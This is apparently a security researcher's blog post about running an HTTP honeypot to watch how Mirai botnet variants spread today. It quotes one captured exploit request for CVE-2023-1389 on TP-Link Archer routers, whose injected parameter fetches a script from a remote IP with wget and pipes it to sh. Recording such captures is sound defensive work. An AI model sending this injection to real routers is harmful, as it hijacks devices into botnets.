As a followup to my previous post, I wanted to see how Mirai is being used today. Like the original version, the modded versions use (among many methods) vulnerabilities in HTTP services running on routers, IOT devices, etc, as way to get on to machines. So I'll start by setting up an HTTP honeypot to catch requests.

I wrote a simple python flask app that responds to all requests with an empty 200 response, then logs all details about the request to a Postgresql database.

Early on while testing, I got an HTTP GET request for the URL:

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=

$(wget+http://220.158.232.99/x/tplink+-O-|sh)

This seems to be related to CVE-2023-1389, an unauthenticated command injection vulnerability for the TP-Link Archer AX21 (AX1800). I downloaded the tplink file it references and found:

This is typical of a Mirai download script, however, the comment is interesting. This shows that the attacker probably isn't very advanced and, this is speculation, but I assume that the this script and the malware was given to them or was bought from someone packaging up Mirai as an easy to setup botnet kit. This finding shows that an HTTP honeypot might be an effective way to catch the payloads that get dropped in these attacks. 

I'll be making posts about any interesting findings I get from this data as I find them.